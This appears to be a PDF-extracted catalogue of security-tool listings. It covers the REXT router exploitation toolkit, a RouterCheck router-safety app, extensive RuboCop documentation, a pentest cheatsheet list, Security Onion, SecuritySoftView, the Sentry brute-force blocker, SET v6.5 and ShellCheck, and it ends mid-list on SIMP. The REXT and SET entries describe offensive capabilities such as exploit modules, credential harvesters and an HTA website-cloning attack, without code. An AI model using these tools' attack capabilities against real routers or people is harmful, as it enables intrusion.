DownloadRemote DLL Injector

REXT - ROUTER EXPLOITATION TOOLKIT
Small toolkit for easy creation and usage of various python

scripts that work with embedded devices.
core - contains most of toolkits basic functions
databases - contains databases, like default credentials
etc.
interface - contains code that is being used for the
creation and manipulation with interface
modules - contains structure of modules, that can be
loaded, every module contains vendor specific sub-
modules where scripts are stored.

decryptors
exploits
harvesters
misc
scanners
output - output goes here
This is still heavy work-in progress
Requirements
I am trying to keep the requirements minimal:

requests
Download REXT
ROUTERCHECK - ANDROID APP FOR ENSURE THE
SAFETY OF YOUR ROUTER
RouterCheck is a system for ensuring the well-being of your

router and home network. Its offered as a smartphone app, but
is far more than just a simple smartphone app. RouterCheck
communicates with a powerful server that helps to check
whether your router is vulnerable to any of the latest attacks
that hackers are launching.
RouterCheck is Security for Your Home Router
RouterCheck is so easy to use, yet performs some very
advanced tests to ensure the safety of your home network.

Simply start RouterCheck and the following things will
automatically be tested for:
Check your configuration
Routers are complex devices and their configuration is

sometimes difficult to understand. The configuration screens
have many options, and it isnt always clear what the effects of
choosing an option will have on your networks security.
RouterCheck makes sure that you havent accidentally enabled
something dangerous.
Passwords
RouterCheck will check to see whether youve changed your

routers default password (very dangerous) or are using a
password thats on hackers lists of common passwords to try.
To learn more about password danger clickPasswords.
Dangerous things enabled
RouterCheck will see whether youve enabled things that are

dangerous such asUPnPorRemote Administration. If you
have, RouterCheck will explain the security implications of this
so that you can make an informed decision on what to do.
Running the latest firmware
RouterCheck checks that your router is updated with the latest

firmware for your model, and if not, what steps you can take to
update it.
Vulnerabilities in your router
RouterCheck will look through several lists of known

vulnerabilities for your router model/firmware to see whether
there are any known problems. It will also perform some of the
same tests that hackers use to see how your router will
respond.
Open Ports
RouterCheck will see if your network has any ports opened to

the internet as a result ofPort Forwarding. If there are and you
have good reason to have the port opened, you can configure
RouterCheck so that it will not flag this situation as an issue in
the future.
DNS is set up properly
Its well understood that when hackers attack home networks,

theDNSconfiguration is the first thing they target. Its very
important that your DNS is reliable and trustworthy, otherwise
all of the computers on your network are at risk.
RouterCheck has several ways to check and ensure that the
DNS servers that youre using are reliable.
Has the router been tampered with?
RouterCheck will run some tests on your router to help

determine if other things in the router have been tampered with
by hackers.
Are you a target?
RouterCheck will look to see whether youre on any of the

commonlists of targetsthat hackers typically use when looking
for devices on the internet that are poorly secured and at risk.
Resolution
When RouterCheck finds that there are any problems with your
router, it willhelp guide you towards the stepsyou must take to
solve the problem.

Checking public WiFi hotspots
Do you ever use WiFi at a coffeeshop, restaurant or other

public place? The dangers of using public WiFi are well
understood and one of the issues is the reliability of the
systems DNS server. If a hacker were successful in
compromising a coffeeshop routers DNS settings, everyone
who used the service would unknowingly become innocent
victims.
RouterCheck allows you to quickly scan a public WiFi hotspot
to ensure that the system is safe to use.
DownloadRouterCheck
RUBOCOP - A RUBY STATIC CODE ANALYZER, BASED
ON THE COMMUNITY RUBY STYLE GUIDE
RuboCop is a Ruby static code analyzer. Out of the box it will

enforce many of the guidelines outlined in the community Ruby
Style Guide .
Most aspects of its behavior can be tweaked via various

configuration options.
Installation
RuboCop 's installation is pretty standard:
$ gem install rubocop
If you'd rather install RuboCop using bundler , don't require it

in your Gemfile :
gem 'rubocop', require: false
Basic Usage
Running rubocop with no arguments will check all Ruby source
files in the current directory:
$ rubocop
Alternatively you can pass rubocop a list of files and directories

to check:
$ rubocop app spec lib/something.rb
Here's RuboCop in action. Consider the following Ruby source

code:
def badName
if something
test
end
end
Running RuboCop on it (assuming it's in a file named

test.rb ) would produce the following report:
Inspecting 1 file
W
Offenses:
test.rb:1:5: C: Use snake_case for method names.
def badName
^^^^^^^
test.rb:2:3: C: Use a guard clause instead of wrapping
the code inside a conditional expression.
if something
^^
test.rb:2:3: C: Favor modifier if usage when having a
single-line body. Another good alternative is the usage
of control flow &&/||.
if something
^^
test.rb:4:5: W: end at 4, 4 is not aligned with if at 2,
2
end
^^^
1 file inspected, 4 offenses detected
For more details check the available command-line options:

$ rubocop -h
Comm
and
flag
Description
-v/-versi
on
Displays the current version and exits.
-V/-verbo
seversi
on
Displays the current version plus the version of

Parser and Ruby.
-L/-listtarge
tfiles
List all files RuboCop will inspect.
-F/-failfast
Inspects in modification time order and stops after

first file with offenses.
-C/-cache
Store and reuse results for faster operation.
-d/-debug
Displays some extra debug output.
-D/-displ
aycopnames
Displays cop names in offense messages.
-c/-confi
g
Run with specified config file.
-f/-forma
t
Choose a formatter.
-o/-out
Write output to a file instead of STDOUT.
-r/-requi
re
Require Ruby file (see Loading Extensions ).
-R/-rails
Run extra Rails cops.
-l/-lint
Run only lint cops.
-a/-autocorre
ct
Auto-correct certain offenses. Note: Experimental

- use with caution.
-only
Run only the specified cop(s) and/or cops in the

specified departments.
-excep
t
Run all cops enabled by configuration except the

specified cop(s) and/or departments.
-autogenconfi
g
Generate a configuration file acting as a TODO

list.
-exclu
delimit
Limit how many individual files --auto-genconfig can list in Exclude parameters, default is
15.
-showcops
Shows available cops and their configuration.
-faillevel
Minimum severity for exit with error code. Full

severity name or upper case initial can be given.
Normally, auto-corrected offenses are ignored.
Use A or autocorrect if you'd like them to trigger
failure.
-s/-stdin
Pipe source from STDIN. This is useful for editor

integration.
Cops
In RuboCop lingo the various checks performed on the code

are called cops. There are several cop departments.
You can also load custom cops .
Style
Most of the cops in RuboCop are so called style cops that
check for stylistics problems in your code. Almost all of the
them are based on the Ruby Style Guide. Many of the style
cops have configurations options allowing them to support
different popular coding conventions.
Lint
Lint cops check for possible errors and very bad practices in
your code. RuboCop implements in a portable way all built-in
MRI lint checks ( ruby -wc ) and adds a lot of extra lint checks
of its own. You can run only the lint cops like this:
$ rubocop -l
The -l / --lint option can be used together with --only to

run all the enabled lint cops plus a selection of other cops.
Disabling any of the lint cops is generally a bad idea.
Metrics
Metrics cops deal with properties of the source code that can
be measured, such as class length, method length, etc.
Generally speaking, they have a configuration parameter called
Max and when running rubocop --auto-gen-config , this
parameter will be set to the highest value found for the

inspected code.
Rails
Rails cops are specific to the Ruby on Rails framework. Unlike
style and lint cops they are not used by default and you have to
request them specifically:
$ rubocop -R
or add the following directive to your .rubocop.yml :

AllCops:
RunRailsCops: true
Configuration
The behavior of RuboCop can be controlled via
the .rubocop.yml configuration file. It makes it possible to
enable/disable certain cops (checks) and to alter their behavior
if they accept any parameters. The file can be placed either in
your home directory or in some project directory.
RuboCop will start looking for the configuration file in the
directory where the inspected file is and continue its way up to
the root directory.
The file has the following format:
inherit_from: ../.rubocop.yml
Style/Encoding:
Enabled: false
Metrics/LineLength:
Max: 99
Note : Qualifying cop name with its type, e.g., Style , is

recommended, but not necessary as long as the cop name is
unique across all types.
Inheritance
RuboCop supports inheriting configuration from one or more

supplemental configuration files at runtime.
Inheriting from another configuration file in the project
The optional inherit_from directive is used to include
configuration from one or more files. This makes it possible to
have the common project settings in the .rubocop.yml file at
the project root, and then only the deviations from those rules in
the subdirectories. The files can be given with absolute paths or
paths relative to the file where they are referenced. The
settings after an inherit_from directive override any settings
in the file(s) inherited from. When multiple files are included, the
first file in the list has the lowest precedence and the last one
has the highest. The format for multiple inheritance is:
inherit_from:
- ../.rubocop.yml
- ../conf/.rubocop.yml
Inheriting configuration from a dependency gem

The optional inherit_gem directive is used to include
configuration from one or more gems external to the current
project. This makes it possible to inherit a shared dependency's
RuboCop configuration that can be used from multiple
disparate projects.
Configurations inherited in this way will be essentially
prepended to the inherit_from directive, such that the
inherit_gem configurations will be loaded first, then the
inherit_from relative file paths will be loaded (overriding the
configurations from the gems), and finally the remaining
directives in the configuration file will supersede any of the
inherited configurations. This means the configurations
inherited from one or more gems have the lowest precedence
of inheritance.
The directive should be formatted as a YAML Hash using the
gem name as the key and the relative path within the gem as
the value:
inherit_gem:
rubocop: config/default.yml
my-shared-gem: .rubocop.yml
cucumber: conf/rubocop.yml
Note : If the shared dependency is declared using a Bundler

Gemfile and the gem was installed using bundle install , it
would be necessary to also invoke RuboCop using Bundler in
order to find the dependency's installation path at runtime:
$ bundle exec rubocop <options...>
Defaults
The file config/default.yml under the RuboCop home directory

contains the default settings that all configurations inherit from.
Project and personal.rubocop.yml files need only make
settings that are different from the default ones. If there is
no .rubocop.yml file in the project or home directory,config/
default.yml will be used.
Including/Excluding files
RuboCop checks all files found by a recursive search starting

from the directory it is run in, or directories given as command
line arguments. However, it only recognizes files ending
with .rb or extensionless files with a #!.*ruby declaration as
Ruby files. Hidden directories (i.e., directories whose names
start with a dot) are not searched by default. If you'd like it to
check files that are not included by default, you'll need to pass
them in on the command line, or to add entries for them under
AllCops / Include . Files and directories can also be ignored
through AllCops / Exclude .
Here is an example that might be used for a Rails project:
AllCops:
Include:
- '**/Rakefile'
- '**/config.ru'
Exclude:
- 'db/**/*'
- 'config/**/*'
- 'script/**/*'
- !ruby/regexp /old_and_unused\.rb$/
# other configuration
# ...
Files and directories are specified relative to the .rubocop.yml

file.
Note : Patterns that are just a file name, e.g. Rakefile , will
match that file name in any directory, but this pattern style
deprecated. The correct way to match the file in any directory,
including the current, is **/Rakefile .
Note : The pattern config/** will match any file recursively
under config , but this pattern style is deprecated and should
be replaced byconfig/**/* .
Note : The Include and Exclude parameters are special.
They are valid for the directory tree starting where they are
defined. They are not shadowed by the setting of Include and
Exclude in other .rubocop.yml files in subdirectories. This is
different from all other parameters, who follow RuboCop's
general principle that configuration for an inspected file is taken
from the nearest .rubocop.yml , searching upwards.
Cops can be run only on specific sets of files when that's
needed (for instance you might want to run some Rails model
checks only on files whose paths matchapp/models/*.rb ). All
cops support the Include param.
Rails/DefaultScope:
Include:
- app/models/*.rb
Cops can also exclude only specific sets of files when that's
needed (for instance you might want to run some cop only on a
specific file). All cops support theExclude param.
Rails/DefaultScope:
Exclude:
- app/models/problematic.rb
Generic configuration parameters

In addition to Include and Exclude , the following parameters
are available for every cop.

Enabled
Specific cops can be disabled by setting Enabled to false for
that specific cop.
Metrics/LineLength:
Enabled: false
Most cops are enabled by default. Some cops, configured in

config/disabled.yml , are disabled by default. The cop enabling
process can be altered by settingDisabledByDefault to true .
AllCops:
DisabledByDefault: true
All cops are then disabled by default, and only cops appearing
in user configuration files are enabled. Enabled: true does
not have to be set for cops in user configuration. They will be
enabled anyway.
Severity
Each cop has a default severity level based on which
department it belongs to. The level is warning for Lint and
convention for all the others. Cops can customize their
severity level. Allowed params are refactor , convention ,
warning , error and fatal .
There is one exception from the general rule above and that is
Lint/Syntax , a special cop that checks for syntax errors
before the other cops are invoked. It can not be disabled and its
severity ( fatal ) can not be changed in configuration.
Metrics/CyclomaticComplexity:
Severity: warning
AutoCorrect
Cops that support the --auto-correct option can have that
support disabled. For example:
Style/PerlBackrefs:
AutoCorrect: false
Automatically Generated Configuration
If you have a code base with an overwhelming amount of

offenses, it can be a good idea to use rubocop --auto-genconfig and add aninherit_from: .rubocop_todo.yml in
your .rubocop.yml . The generated file .rubocop_todo.yml
contains configuration to disable cops that currently detect an
offense in the code by excluding the offending files, or disabling
the cop altogether once a file count limit has been reached.
By adding the option --exclude-limit COUNT , e.g., rubocop
--auto-gen-config --exclude-limit 5 , you can change
how many files are excluded before the cop is entirely disabled.
The default COUNT is 15.
Then you can start removing the entries in the
generated .rubocop_todo.yml file one by one as you work
through all the offenses in the code.
Disabling Cops within Source Code

One or more individual cops can be disabled locally in a section
of a file by adding a comment such as
# rubocop:disable Metrics/LineLength, Style/
StringLiterals
[...]
# rubocop:enable Metrics/LineLength, Style/StringLiterals
You can also disable all cops with

# rubocop:disable all
[...]
# rubocop:enable all
One or more cops can be disabled on a single line with an endof-line comment.
for x in (0..19) # rubocop:disable Style/AvoidFor
Formatters
You can change the output format of RuboCop by specifying
formatters with the -f/--format option. RuboCop ships with
several built-in formatters, and also you can create your custom
formatter.
Additionally the output can be redirected to a file instead of
$stdout with the -o/--out option.
Some of the built-in formatters produce machine-parsable
output and they are considered public APIs. The rest of the
formatters are for humans, so parsing their outputs is
discouraged.
You can enable multiple formatters at the same time by
specifying -f/--format multiple times. The -o/--out option
applies to the previously specified -f/--format , or the default
progress format if no -f/--format is specified before the o/--out option.
# Simple format to $stdout.
$ rubocop --format simple
# Progress (default) format to the file result.txt.
$ rubocop --out result.txt
# Both progress and offense count formats to $stdout.
# The offense count formatter outputs only the final
summary,
# so you'll mostly see the outputs from the progress
formatter,
# and at the end the offense count summary will be
outputted.
$ rubocop --format progress --format offenses

# Progress format to $stdout, and JSON format to the file
rubocop.json.
$ rubocop --format progress --format json --out
rubocop.json
#
~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~
#
|_______________|
$stdout
# Progress format to result.txt, and simple format to

$stdout.
$ rubocop --output result.txt --format simple
#
~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~
#
#
|
default format
|
$stdout
You can also load custom formatters .

Progress Formatter (default)
The default progress formatter outputs a character for each
inspected file, and at the end it displays all detected offenses in

the clang format. A .represents a clean file, and each of the
capital letters means the severest offense (convention,
warning, error or fatal) found in a file.
$ rubocop
Inspecting 26 files
..W.C....C..CWCW.C...WC.CC
Offenses:
lib/foo.rb:6:5: C: Missing top-level class documentation
comment.
class Foo
^^^^^
...
26 files inspected, 46 offenses detected
Clang Style Formatter

The clang formatter displays the offenses in a manner similar
to clang :
$ rubocop test.rb
Inspecting 1 file
W
Offenses:
test.rb:1:5: C: Use snake_case for method names.
def badName
^^^^^^^
test.rb:2:3: C: Use a guard clause instead of wrapping
the code inside a conditional expression.
if something
^^
test.rb:2:3: C: Favor modifier if usage when having a
single-line body. Another good alternative is the usage
of control flow &&/||.
if something
^^
test.rb:4:5: W: end at 4, 4 is not aligned with if at 2,
2
end
^^^
Fuubar Style Formatter

The fuubar style formatter displays a progress bar and shows
details of offenses in the clang format as soon as they are
detected. This is inspired by theFuubar formatter for RSpec.

$ rubocop --format fuubar
lib/foo.rb.rb:1:1: C: Use snake_case for methods and
variables.
def badName
^^^^^^^
lib/bar.rb:13:14: W: File.exists? is deprecated in favor
of File.exist?.
File.exists?(path)
^^^^^^^
22/53 files |======== 43 ========>
|
ETA: 00:00:02
Emacs Style Formatter
Machine-parsable
The emacs formatter displays the offenses in a format suitable
for consumption by Emacs (and possibly other tools).
$ rubocop --format emacs test.rb
/Users/bozhidar/projects/test.rb:1:1: C: Use snake_case
for methods and variables.
/Users/bozhidar/projects/test.rb:2:3: C: Favor modifier
if/unless usage when you have a single-line body. Another
good alternative is the usage of control flow &&/||.
/Users/bozhidar/projects/test.rb:4:5: W: end at 4, 4 is
not aligned with if at 2, 2
Simple Formatter
The name of the formatter says it all :-)

$ rubocop --format simple test.rb
== test.rb ==
C:
1:
5: Use snake_case for method names.
C:
2:
3: Use a guard clause instead of wrapping the
code inside a conditional expression.

C:
2:
3: Favor modifier if usage when having a single-
line body. Another good alternative is the usage of

control flow &&/||.
W:
4:
5: end at 4, 4 is not aligned with if at 2, 2
File List Formatter
Machine-parsable
Sometimes you might want to just open all files with offenses in
your favorite editor. This formatter outputs just the names of the
files with offenses in them and makes it possible to do
something like:
$ rubocop --format files | xargs vim
JSON Formatter
Machine-parsable
You can get RuboCop's inspection result in JSON format by
passing --format json option in command line. The JSON
structure is like the following example:
{
"metadata": {
"rubocop_version": "0.9.0",
"ruby_engine": "ruby",
"ruby_version": "2.0.0",
"ruby_patchlevel": "195",
"ruby_platform": "x86_64-darwin12.3.0"
},
"files": [{
"path": "lib/foo.rb",
"offenses": []
}, {
"path": "lib/bar.rb",
"offenses": [{
"severity": "convention",
"message": "Line is too long. [81/80]",
"cop_name": "LineLength",
"corrected": true,
"location": {
"line": 546,
"column": 80,
"length": 4
}
}, {
"severity": "warning",
"message": "Unreachable code detected.",
"cop_name": "UnreachableCode",
"corrected": false,
"location": {
"line": 15,
"column": 9,
"length": 10
}
}
]
}
],
"summary": {
"offense_count": 2,
"target_file_count": 2,
"inspected_file_count": 2
}
}
Offense Count Formatter
Sometimes when first applying RuboCop to a codebase, it's

nice to be able to see where most of your style cleanup is going
to be spent.
With this in mind, you can use the offense count formatter to
outline the offended cops and the number of offenses found for
each by running:
$ rubocop --format offenses
87
Documentation
12
DotPosition
AvoidGlobalVars
EmptyLines
AssignmentInCondition
Blocks
CommentAnnotation
BlockAlignment
IndentationWidth
AvoidPerlBackrefs
ColonMethodCall
-134
Total
HTML Formatter
Useful for CI environments. It will create an HTML report like

this .
$ rubocop --format html -o rubocop.html
Compatibility
RuboCop supports the following Ruby implementations:
MRI 1.9.3
MRI 2.0
MRI 2.1
MRI 2.2
JRuby in 1.9 mode
Rubinius 2.0+
Editor integration
Emacs
rubocop.el is a simple Emacs interface for RuboCop. It allows

you to run RuboCop inside Emacs and quickly jump between
problems in your code.
flycheck > 0.9 also supports RuboCop and uses it by default
when available.
Vim
The vim-rubocop plugin runs RuboCop and displays the results

in Vim.
There's also a RuboCop checker in syntastic .
Sublime Text
If you're a ST user you might find the Sublime RuboCop plugin

useful.
Brackets
The brackets-rubocop extension displays RuboCop results in

Brackets. It can be installed via the extension manager in
Brackets.
TextMate2
The textmate2-rubocop bundle displays formatted RuboCop

results in a new window. Installation instructions can be found
here .
Atom
The atom-lint package runs RuboCop and highlights the

offenses in Atom.
You can also use the linter-rubocop plugin for Atom's linter .
LightTable
The lt-rubocop plugin provides LightTable integration.

RubyMine
The rubocop-for-rubymine plugin provides basic RuboCop

integration for RubyMine/IntelliJ IDEA.
Other Editors
Here's one great opportunity to contribute to RuboCop implement RuboCop integration for your favorite editor.
Git pre-commit hook integration

overcommit is a fully configurable and extendable Git commit
hook manager. To use RuboCop with overcommit, add the
following to your .overcommit.ymlfile:
PreCommit:
RuboCop:
enabled: true
Guard integration
If you're fond of Guard you might like guard-rubocop . It allows
you to automatically check Ruby code style with RuboCop
when files are modified.
Rake integration
To use RuboCop in your Rakefile add the following:
require 'rubocop/rake_task'
RuboCop::RakeTask.new
If you run rake -T , the following two RuboCop tasks should

show up:
rake rubocop
# Run
RuboCop
rake rubocop:auto_correct
# Auto-
correct RuboCop offenses
The above will use default values

require 'rubocop/rake_task'
desc 'Run RuboCop on the lib directory'
RuboCop::RakeTask.new(:rubocop) do |task|
task.patterns = ['lib/**/*.rb']
# only show the files with failures
task.formatters = ['files']
# don't abort rake on failure
task.fail_on_error = false
end
Caching
Large projects containing hundreds or even thousands of files
can take a really long time to inspect, but RuboCop has
functionality to mitigate this problem. There's a caching
mechanism that stores information about offenses found in
inspected files.
Cache Validity
Later runs will be able to retrieve this information and present

the stored information instead of inspecting the file again. This
will be done if the cache for the file is still valid, which it is if
there are no changes in:
the contents of the inspected file
RuboCop configuration for the file
the options given to rubocop , with some exceptions that
have no bearing on which offenses are reported
the Ruby version used to invoke rubocop
version of the rubocop program (or to be precise,
anything in the source code of the invoked rubocop
program)
Enabling and Disabling the Cache
The caching functionality is enabled if the configuration

parameter AllCops: UseCache is true , which it is by default.
The command line option --cache false can be used to turn
off caching, thus overriding the configuration parameter. If
AllCops: UseCache is set to false in the
local.rubocop.yml , then it's --cache true that overrides the
setting.
Cache Path
By default, the cache is stored in in a subdirectory of the

temporary directory, /tmp/rubocop_cache/ on Unix-like
systems. The configuration parameterAllCops:
CacheRootDirectory can be used to set it to a different path.
One reason to use this option could be that there's a network
disk where users on different machines want to have a
common RuboCop cache. Another could be that a Continuous
Integration system allows directories, but not a temporary
directory, to be saved between runs.
Cache Pruning
Each time a file has changed, its offenses will be stored under
a new key in the cache. This means that the cache will continue
to grow until we do something to stop it. The configuration
parameter AllCops: MaxFilesInCache sets a limit, and when
the number of files in the cache exceeds that limit, the oldest
files will be automatially removed from the cache.
Extensions
It's possible to extend RuboCop with custom cops and
formatters.
Loading Extensions
Besides the --require command line option you can also
specify ruby files that should be loaded with the optional

require directive in the.rubocop.yml file:
require:
- ../my/custom/file.rb
- rubocop-extension
Note: The paths are directly passed to Kernel.require . If

your extension file is not in $LOAD_PATH , you need to specify
the path as relative path prefixed with ./ explicitly, or absolute
path.
Custom Cops
You can configure the custom cops in your .rubocop.yml just

like any other cop.
Known Custom Cops
rubocop-rspec - RSpec-specific analysis
Custom Formatters
You can customize RuboCop's output format with custom

formatters.
Creating Custom Formatter
To implement a custom formatter, you need to subclass
RuboCop::Formatter::BaseFormatter and override some
methods, or implement all formatter API methods by duck
typing.
Please see the documents below for more formatter API
details.
RuboCop::Formatter::BaseFormatter
RuboCop::Cop::Offense
Parser::Source::Range
Using Custom Formatter in Command Line

You can tell RuboCop to use your custom formatter with a
combination of --format and --require option. For example,
when you have definedMyCustomFormatter in ./path/to/
my_custom_formatter.rb , you would type this command:
$ rubocop --require ./path/to/my_custom_formatter -format MyCustomFormatter
Download Rubocop
SECURITY CHEATSHEETS - A COLLECTION OF
CHEATSHEETS FOR VARIOUS INFOSEC TOOLS AND
TOPICS
These security cheatsheets are part of a project for the Ethical

Hacking and Penetration Testing course offered at the
University of Florida. Expanding on the default set of
cheatsheets, the purpose of these cheatsheets are to aid
penetration testers/CTF participants/security enthusiasts in
remembering commands that are useful, but not frequently
used. Most of the tools that will be covered have been included
in our class and are available in Kali Linux.
Requirements
How to Use
In order to use these cheatsheets, the cheatsheets in this

repository need to go into ~/.cheat/ directory. After the files
are moved into that directory, cheat ncat will display the ncat
cheatsheet.
CheatSheets:
aircrack-ng
cewl
cidr
cookies
dig
fierce
ftp
http
https-ssl-tls
hydra
john
maltego
markdown
medusa
metasploit
mysql
ncat
nikto
nping
permissions
php
pivoting
ps
python
ruby
shadow
shodan
sqlmap
tcpdump
webservervulns
wireless-encryptions
wireshark
DownloadSecurity CheatSheets
SECURITY ONION - LINUX DISTRO FOR INTRUSION

DETECTION, NETWORK SECURITY MONITORING, AND
LOG MANAGEMENT
Security Onion is a Linux distro for intrusion detection, network

security monitoring, and log management. It's based on Ubuntu
and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert,
ELSA, Xplico, NetworkMiner, and many other security tools.
The easy-to-use Setup wizard allows you to build an army of

distributed sensors for your enterprise in minutes!
Easy-to-use Setup wizard allows you to build an army of

distributed sensors for your enterprise in minutes
Analyze your NIDS/HIDS alerts with Squert
Pivot between multiple data types with Sguil and send pcaps to
Wireshark and NetworkMiner
Use ELSA to slice and dice your logs
Access full packet capture with CapMe
Snort/Suricata and Bro compiled with PF_RING to handle lots

of traffic
Easy updates
Data Types
Alert data - HIDS alerts from OSSEC and NIDS alerts

from Snort/Suricata
Asset data from Prads and Bro
Full content data from netsniff-ng
Host data via OSSEC and syslog-ng
Session data from Argus, Prads, and Bro
Transaction data - http/ftp/dns/ssl/other logs from Bro
DownloadSecurity Onion
SECURITYSOFTVIEW - DISPLAYS THE ANTIVIRUS /
ANTISPYWARE / FIREWALL REGISTERED WITH THE
SECURITY CENTER OF WINDOWS
SecuritySoftView is a simple tool that displays the AntiVirus,

AntiSpyware, and Firewall programs that are currently installed
on your system and registered with the security center of
Windows operating system.
System Requirements
This utility works on any version of Windows, starting from

Windows XP and up to Windows 10. Both 32-bit and 64-bit
systems are supported. However, on Windows XP,
SecuritySoftView displays less information than Windows Vista
or later.
Start Using SecuritySoftView
SecuritySoftView doesn't require any installation process or

executable file - SecuritySoftView.exe
After running SecuritySoftView, the main window displays the
list of all AntiVirus/AntiSpyware/Firewall programs that are
currently registered with the security center of Windows
operating system. Be aware that the same software might
appear more than once, but different product type.
/stext
<Filename>
Save the list of security programs into a

simple text file.
/stab
<Filename>

/scomma
<Filename>

/stabular
<Filename>

tabular text file.
/shtml
<Filename>
Save the list of security programs into

/sverhtml
<Filename>
Save the list of security programs into

/sxml
<Filename>
Save the list of security programs into XML

file.
Download SecuritySoftView
SENTRY - BRUTEFORCE ATTACK BLOCKER (SSH, FTP,
SMTP, AND MORE)
Sentry detects and prevents bruteforce attacks against sshd

using minimal system resources.
SAFE
To prevent inadvertant lockouts, Sentry manages a whitelist of
IPs that have connected more than 3 times and succeeded at
least once. Never again will that forgetful colleague behind the
office NAT router get us locked out of our system. Nor the
admin whose script just failed to login 12 times in 2 seconds.
Sentry includes support for adding IPs to a firewall. Support for
IPFW, PF, ipchains is included. Firewall support is disabled by
default. This is because firewall rules may terminate existing
session(s) to the host (attn IPFW users). Get your IPs
whitelisted (connect 3x or use --whitelist) before enabling the
firewall option.
SIMPLE
Sentry has an extremely simple database for tracking IPs. This
makes it very easy for administrators to view and manipulate
the database using shell commands and scripts. See the
EXAMPLES section.
Sentry is written in perl, which is installed everywhere you find
sshd. It has no dependencies. Installation and deployment is
extremely simple.
FLEXIBLE
Sentry supports blocking connection attempts using
tcpwrappers and several popular firewalls. It is easy to extend
sentry to support additional blocking lists.
Sentry was written to protect the SSH daemon but anticipates
use with other daemons. SMTP support is planned. As this was
written, the primary attack platform in use is bot nets comprised
of exploited PCs on high-speed internet connections. These
bots are used for carrying out SSH attacks as well as spam
delivery. Blocking bots prevents multiple attack vectors.
The programming style of sentry makes it easy to insert code
for additonal functionality.
EFFICIENT
The primary goal of Sentry is to minimize the resources an
attacker can steal, while consuming minimal resources itself.
Most bruteforce blocking apps (denyhosts, fail2ban, sshdfilter)
expect to run as a daemon, tailing a log file. That requires a
language interpreter to always be running, consuming at least
10MB of RAM. A single hardware node with dozens of virtual
servers will lose hundreds of megs to daemon protection.
Sentry uses resources only when connections are made. The
worse case scenario is the first connection made by an IP,
since it will invoke a perl interpreter. For most connections,
Sentry will append a timestamp to a file, stat for the presense of
another file and exit.
Once an IP is blacklisted for abuse, whether by tcpd or a
firewall, the resources it can consume are practically zero.
Sentry is not particularly efficient for reporting. The "one file per
IP" is superbly minimal for logging and blacklisting, but nearly
any database would perform better for reporting. Expect to wait
a few seconds for sentry --report.
REQUIRED ARGUMENTS
ip
An IPv4 address. The IP should come from a reliable
source that is difficult to spoof. Tcpwrappers is an
excellent source. UDP connections are a poor source as
they are easily spoofed. The log files of TCP daemons can
be good source if they are parsed carefully to avoid log
injection attacks.
All actions except report and help require an IP address. The
IP address can be manually specified by an administrator, or

preferably passed in by a TCP server such as tcpd
(tcpwrappers), inetd, or tcpserver (daemontools).
ACTIONS
blacklist
deny all future connections
whitelist
whitelist all future connections, remove the IP from the
blacklists, and make it immune to future connection tests.
delist
remove an IP from the white and blacklists. This is useful
for testing that sentry is working as expected.
connect
register a connection by an IP. The connect method will
log the attempt and the time. See CONNECT.
update
Check the most recent version of sentry against the
installed version and update if a newer version is
available.
EXAMPLES
IP REPORT
$ /var/db/sentry/sentry.pl -r --ip=24.19.45.95
9 connections from 24.19.45.95
and it is whitelisted
HOME GATEWAY REPORT
$ /var/db/sentry/sentry.pl -r
-------- summary --------1614 unique IPs have connected 76525 times
1044 IPs are blacklisted
18 IPs are whitelisted
WEB SERVER REPORT

EUROPEAN DNS MIRROR

DownloadSentry
SET V6.5 - THE SOCIAL-ENGINEER TOOLKIT MR ROBOT
The Social-Engineer Toolkit (SET) was created and written by

the founder of TrustedSec. It is an open-source Python-driven
tool aimed at penetration testing around Social-Engineering.
SET has been presented at large-scale conferences including
Blackhat, DerbyCon, Defcon, and ShmooCon. With over two
million downloads, SET is the standard for social-engineering
penetration tests and supported heavily within the security
community.
The Social-Engineer Toolkit has over 2 million downloads and
is aimed at leveraging advanced technological attacks in a
social-engineering type environment. TrustedSec believes that
social-engineering is one of the hardest attacks to protect
against and now one of the most prevalent. The toolkit has
been featured in a number of books including the number one
best seller in security books for 12 months since its release,
Metasploit: The Penetrations Testers Guide written by
TrustedSecs founder as well as Devon Kearns, Jim OGorman,
and Mati Aharoni.
The next major revision of The Social-Engineer Toolkit (SET)
v6.5 codename Mr Robot has just been released. The

codename is in celebration of the TV show Mr Robot featuring
SET last night! Kudos to them for having some amazing tech
writers and appreciate the shoutout on the show.
This version incorporates a new HTA web attack vector

(thanks Justin Elze aka ginger) for sharing the attack vector
with me. This attack allows you to clone a website and inject an
HTA file which compromises the system.
Additionally, SET added a lot of the new exploits including the
hacking team adobe zero-day, and others from Metasploit.

Full changelog below:
~~~~~~~~~~~~~~~~
version 6.5
~~~~~~~~~~~~~~~~
* added brand new attack vector HTA attack and
incorporated powershell injection into it
* fixed a prompt that would cause double IP questions in
certain attack vectors
* slimmed down powershell injection http/https attack
vectors in order to use in payload delivery
* added exploit to browser attack Adobe Flash Player
ByteArray Use After Free (2015-07-06)
Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
Drawing Fill Shader Memory Corruption (2015-05-12)
Supported platforms
Linux
Windows (experimental)
DownloadSET v6.5
SHELLCHECK - AUTOMATICALLY DETECTS PROBLEMS
WITH SH/BASH SCRIPTS AND COMMANDS
ShellCheck is a static analysis and linting tool for sh/bash

scripts. It's mainly focused on handling typical beginner and
intermediate level syntax errors and pitfalls where the shell just
gives a cryptic error message or strange behavior, but it also
reports on a few more advanced issues where corner cases
can cause delayed failures.
Haskell source code is available on GitHub!
Run ShellCheck online

SIMP - SYSTEM INTEGRITY MANAGEMENT PLATFORM
SIMP is a framework that aims to provide a reasonable

combination of security compliance and operational flexibility.
The ultimate goal of the project is to provide a complete
management environment focused on compliance with the
various profiles in the SCAP Security Guide Project and
industry best practice.
Though it is fully capable out of the box, the intent of SIMP is to
be molded to your target environment in such a way that
deviations are easily identifiable to both Operations Teams and
Security Officers.
Supported Operating Systems
The following Operating Systems are supported:

Red Hat Enterprise Linux
6.6
7.1
CentOS
6.6
7.1-1503-01
Technology components
SIMP uses Puppet to manage and maintain the configuration of

the various component systems.
Though there are many possible configurations, out of the box
SIMP provides:
Management
Puppet Server
PuppetDB
MCollective
Authentication
OpenLDAP
Kickstart/Update
YUM
DNS
DHCP
TFTP
SIMP Provided Materials
Build Materials
simp-core
simp-doc
simp-rsync
Puppet Modules
pupmod-simp-acpid
pupmod-simp-activemq
pupmod-simp-aide
pupmod-simp-apache
pupmod-simp-auditd
